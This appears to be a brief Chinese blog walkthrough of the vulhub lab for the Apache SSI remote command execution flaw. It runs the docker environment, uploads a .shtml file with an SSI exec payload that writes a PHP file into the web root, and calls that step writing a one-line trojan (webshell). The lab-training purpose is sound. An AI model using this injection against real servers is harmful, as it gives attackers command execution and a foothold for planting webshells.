本文主要是介绍vulhub中的Apache SSI 远程命令执行漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Apache SSI 远程命令执行漏洞
1.cd到ssi-rce
cd /opt/vulhub/httpd/ssi-rce/
2.执行docker-compose up -d
docker-compose up -d
3.查看靶场是否开启成功
dooker ps
拉取成功了
4.访问url
这里已经执行成功了,注意这里需要加入/upload.php
5.写入一句话木马
<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->
6.提交查询
7.点击shell.shtml
8.查看是否写入成功
docker exec -it ssi-rce_apache_1 /bin/bash
9.获取phpinfo
这篇关于vulhub中的Apache SSI 远程命令执行漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
